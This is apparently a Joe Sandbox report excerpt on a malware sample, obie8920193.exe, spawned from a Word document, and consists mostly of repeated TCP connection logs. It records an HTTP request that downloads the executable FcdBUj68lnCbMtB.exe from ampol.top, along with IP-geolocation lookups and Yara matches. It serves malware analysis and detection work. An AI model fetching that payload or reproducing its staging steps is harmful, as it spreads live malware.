            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global traffic | TCP traffic: 192.168.2.22:49163 <-> 104.21.53.203:443 (183 packets, both directions)
            Source: global traffic | TCP traffic: 192.168.2.22:49164 <-> 158.101.44.242:80 (18 packets, both directions)
            Source: global traffic | TCP traffic: 192.168.2.22:49165 <-> 188.114.96.3:443 (16 packets, both directions)
            Source: global traffic | TCP traffic: 192.168.2.22:49166 <-> 188.114.96.3:443 (12 packets, both directions)
            Source: global traffic | TCP traffic: 192.168.2.22:49167 <-> 193.122.6.168:80 (11 packets, both directions)
            Source: global traffic | TCP traffic: 192.168.2.22:49168 <-> 188.114.96.3:443 (12 packets, both directions)
            Source: global traffic | TCP traffic: 192.168.2.22:49169 <-> 193.122.130.0:80 (7 packets, both directions)
            Source: global traffic | TCP traffic: 192.168.2.22:49170 <-> 188.114.96.3:443 (12 packets, both directions)
            Source: global traffic | TCP traffic: 192.168.2.22:49171 <-> 158.101.44.242:80 (10 packets, both directions)
            Source: global traffic | TCP traffic: 192.168.2.22:49172 <-> 188.114.96.3:443 (12 packets, both directions)
            Source: global traffic | TCP traffic: 192.168.2.22:49173 <-> 158.101.44.242:80 (12 packets, both directions)
            Source: global traffic | TCP traffic: 192.168.2.22:49174 <-> 188.114.96.3:443 (12 packets, both directions)
            Source: global traffic | TCP traffic: 192.168.2.22:49175 <-> 193.122.130.0:80 (6 packets, both directions)
            Source: global traffic | TCP traffic: 192.168.2.22:49176 <-> 188.114.96.3:443 (4 packets, both directions)

            Networking

            Source: Yara match | File source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE
            Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive (4 requests)
            Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org (4 requests)
            Source: Joe Sandbox View | IP Address: 193.122.6.168
            Source: Joe Sandbox View | IP Address: 188.114.96.3
            Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
            Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | DNS query: name: checkip.dyndns.org (32 queries)
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | DNS query: name: reallyfreegeoip.org (8 queries)
            Source: global trafficHTTP traffic detected: GET /FcdBUj68lnCbMtB.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ampol.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{57BE0F5E-0BF5-4CE6-96F3-B3AC962F851D}.tmpJump to behavior
            Source: global trafficHTTP traffic detected: GET /FcdBUj68lnCbMtB.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ampol.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
